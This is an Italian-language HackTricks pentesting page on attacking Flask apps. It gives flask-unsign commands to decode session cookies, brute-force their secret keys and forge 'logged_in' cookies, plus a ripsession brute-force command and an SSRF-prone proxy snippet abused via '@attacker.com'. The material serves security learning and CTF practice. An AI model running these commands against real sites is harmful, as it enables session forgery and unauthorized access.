5.7 KiB
Flask
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
Probabilmente se stai partecipando a un CTF, un'applicazione Flask sarà correlata a SSTI.
Cookies
Il nome della sessione cookie predefinito è session.
Decoder
Decoder di cookie Flask online: https://www.kirsle.net/wizards/flask-session.cgi
Manuale
Prendi la prima parte del cookie fino al primo punto e decodificalo in Base64.
echo "ImhlbGxvIg" | base64 -d
Il cookie è anche firmato utilizzando una password
Flask-Unsign
Strumento da riga di comando per recuperare, decodificare, forzare e creare cookie di sessione di un'applicazione Flask indovinando le chiavi segrete.
{% embed url="https://pypi.org/project/flask-unsign/" %}
pip3 install flask-unsign
Decodifica Cookie
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
Forza Bruta
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
Firma
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
Firmare utilizzando versioni legacy (vecchie versioni)
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
RIPsession
Strumento da riga di comando per forzare siti web utilizzando cookie creati con flask-unsign.
{% embed url="https://github.com/Tagvi/ripsession" %}
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
SQLi nel cookie di sessione Flask con SQLmap
Questo esempio utilizza l'opzione eval di sqlmap per firmare automaticamente i payload di sqlmap per Flask utilizzando un segreto noto.
Proxy Flask per SSRF
In questo writeup viene spiegato come Flask consenta una richiesta che inizia con il carattere "@":
GET @/ HTTP/1.1
Host: target.com
Connection: close
Quale tra i seguenti scenari:
from flask import Flask
from requests import get
app = Flask('__main__')
SITE_NAME = 'https://google.com/'
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content
app.run(host='0.0.0.0', port=8080)
Potrebbe consentire di introdurre qualcosa come "@attacker.com" per causare un SSRF.
Usa Trickest per costruire e automatizzare flussi di lavoro alimentati dagli strumenti della comunità più avanzati al mondo.
Accedi oggi:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
{% hint style="success" %}
Impara e pratica Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository github.